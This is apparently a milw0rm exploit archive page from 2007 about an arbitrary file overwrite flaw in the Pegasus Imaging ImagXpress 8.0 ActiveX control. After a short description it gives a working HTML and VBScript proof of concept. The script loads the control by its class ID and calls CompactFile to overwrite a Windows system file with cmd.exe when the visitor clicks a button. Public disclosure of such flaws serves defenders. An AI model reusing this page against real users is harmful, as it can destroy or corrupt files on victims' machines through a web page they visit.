37 lines
No EOL
1.5 KiB
HTML
37 lines
No EOL
1.5 KiB
HTML
<pre>
|
|
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
|
|
<b>Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite</b>
|
|
url: http://www.pegasusimaging.com/
|
|
|
|
Author: shinnai
|
|
mail: shinnai[at]autistici[dot]org
|
|
site: http://shinnai.altervista.org
|
|
|
|
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
|
|
Author will be not responsible for any damage.</font></b>
|
|
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
|
|
|
<b>Description:
|
|
Component name: PegasusImaging.ActiveX.ImagXpress8.dll
|
|
Vesrion: 8.0.41.0
|
|
This component contains an insecure "CompactFile()" which overwrites
|
|
arbitrary files on user's pc.
|
|
Passing to the first parameter (sourceFile) of the method an existing
|
|
file as argument (e.g. a well known file as cmd.exe), the file passed
|
|
as argument to the second parameter (destFile) will be overwrite.</b>
|
|
-----------------------------------------------------------------------------
|
|
<object classid='clsid:6277B638-833D-4315-9D78-60FC451DAF07' id='test'></object>
|
|
|
|
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
|
|
|
|
<script language='vbscript'>
|
|
Sub tryMe
|
|
test.CompactFile "c:\windows\system32\cmd.exe", "c:\windows\system_.ini"
|
|
MsgBox "Exploit completed."
|
|
End Sub
|
|
</script>
|
|
</span></span>
|
|
</code></pre>
|
|
|
|
# milw0rm.com [2007-10-05] |